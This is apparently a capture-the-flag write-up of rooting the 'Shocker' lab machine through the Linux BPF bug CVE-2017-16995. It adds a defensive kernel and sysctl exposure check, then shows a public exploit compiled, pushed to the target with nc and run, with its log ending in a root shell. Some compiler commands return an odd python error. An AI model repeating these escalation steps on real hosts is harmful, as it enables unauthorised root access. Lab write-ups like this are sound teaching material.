CVE-2017-16995
PEAS has discovered that the target system is vulnerable to CVE-2017-16995.
A vulnerability classified as critical has been found in the Linux kernel up to 4.14.8 (Operating System). Affected is the function check_alu_op of the file kernel/bpf/verifier.c in the Sign Extension component. Manipulation with an unknown input leads to a memory corruption vulnerability. CWE classifies the issue as CWE-119: the software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. This impacts confidentiality, integrity, and availability.
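An added defender-side exposure check, not part of the original writeup and not the exploit: it flags a kernel release inside the range the advisory text above gives (up to 4.14.8) and tests whether unprivileged users can still load BPF programs, read from the kernel.unprivileged_bpf_disabled sysctl, which is the standard stop-gap when the kernel cannot be patched immediately. The version bound is taken from the advisory text; the sysctl path is the real one; distribution kernels backport fixes without bumping the release number, so a version-only hit is a prompt to check the vendor advisory rather than a confirmed finding.

```shell
#!/bin/sh
# Added host-exposure check for CVE-2017-16995 (not the page's code).
# Two conditions matter: a kernel release in the advisory range, and
# unprivileged BPF program loading still enabled, since the bug is
# reached through the BPF verifier.

# kernel_version_affected RELEASE -> true (0) if RELEASE is <= 4.14.8,
# the upper bound stated in the advisory text. Distro suffixes such as
# "-96-generic" are stripped; missing components count as 0.
kernel_version_affected() {
    v=$(printf '%s' "$1" | sed 's/[^0-9.].*$//')
    [ -n "$v" ] || return 1            # unparseable input: do not flag
    # split major.minor.patch into the positional parameters
    set -- $(printf '%s' "$v" | tr '.' ' ')
    maj=${1:-0}; min=${2:-0}; pat=${3:-0}
    if [ "$maj" -lt 4 ]; then return 0; fi
    if [ "$maj" -gt 4 ]; then return 1; fi
    if [ "$min" -lt 14 ]; then return 0; fi
    if [ "$min" -gt 14 ]; then return 1; fi
    [ "$pat" -le 8 ]
}

# unprivileged_bpf_status [FILE] -> prints enabled|disabled|unknown.
# FILE defaults to the real sysctl node; 1 (or 2 on newer kernels)
# means unprivileged users cannot load BPF programs.
unprivileged_bpf_status() {
    f=${1:-/proc/sys/kernel/unprivileged_bpf_disabled}
    [ -r "$f" ] || { echo unknown; return; }
    case $(cat "$f") in
        0)   echo enabled ;;
        1|2) echo disabled ;;
        *)   echo unknown ;;
    esac
}

# assess_host [RELEASE] [SYSCTL_FILE] -> true (0) when both conditions
# hold; both arguments default to the live host values.
assess_host() {
    rel=${1:-$(uname -r)}
    bpf=$(unprivileged_bpf_status "$2")
    if kernel_version_affected "$rel" && [ "$bpf" = enabled ]; then
        echo "exposed: kernel $rel is in the advisory range and unprivileged BPF is enabled"
        return 0
    fi
    echo "not exposed by version/sysctl: kernel $rel, unprivileged BPF $bpf"
    return 1
}

# Usage: sh check-cve-2017-16995.sh --check   (assesses the local host)
if [ "${1:-}" = "--check" ]; then assess_host; fi
```

Setting the sysctl to 1 (sysctl -w kernel.unprivileged_bpf_disabled=1) cannot be reverted without a reboot on kernels that only know values 0 and 1, which is why it makes a dependable interim control while the kernel update is scheduled.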
Exploit
I found the exploit online
shelly@Shocker:/dev/shm$ gcc
bash: /usr/bin/python: No such file or directory
shelly@Shocker:/dev/shm$ make
bash: /usr/bin/python: No such file or directory
shelly@Shocker:/dev/shm$ cc
bash: /usr/bin/python: No such file or directory
Local compilation is not available on the target, so the exploit is compiled remotely instead.
Docker Exploit Development
┌──(kali㉿kali)-[~/archive/htb/labs/shocker]
└─$ docker run -it --entrypoint "/bin/bash" --name shocker ubuntu:16.04
root@f62cf0dcc337:/# apt update -y ; apt install net-tools netcat gcc gcc-multilib nano git make wget -y
Setting up the environment
root@f62cf0dcc337:~# gcc CVE-2017-16995.c -o CVE-2017-16995
Compile
root@f62cf0dcc337:~# nc 10.10.10.56 3333 < CVE-2017-16995
shelly@shocker:/dev/shm$ nc -nlvp 3333 > CVE-2017-16995
Listening on [0.0.0.0] (family 0, port 3333)
Connection from [10.10.14.2] port 3333 [tcp/*] accepted (family 2, sport 42134)
shelly@shocker:/dev/shm$ chmod 755 CVE-2017-16995
Delivery complete
shelly@shocker:/dev/shm$ ./CVE-2017-16995
./CVE-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88001938a600
[*] Leaking sock struct from ffff880017de0800
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff8800183d3680
[*] uid from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff8800183d3680
[*] credentials patched, launching shell...
# whoami
whoami
root
# hostname
hostname
Shocker
# ifconfig
ifconfig
ens192 link encap:Ethernet HWaddr 00:50:56:b9:89:cf
inet addr:10.10.10.56 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:89cf/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:89cf/64 Scope:Link
up broadcast running multicast mtu:1500 Metric:1
rx packets:12442 errors:0 dropped:20 overruns:0 frame:0
tx packets:9216 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:14887158 (14.8 MB) TX bytes:1763096 (1.7 MB)
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
up loopback running mtu:65536 Metric:1
rx packets:21168 errors:0 dropped:0 overruns:0 frame:0
tx packets:21168 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
rx bytes:1568156 (1.5 MB) TX bytes:1568156 (1.5 MB)
System Level Compromise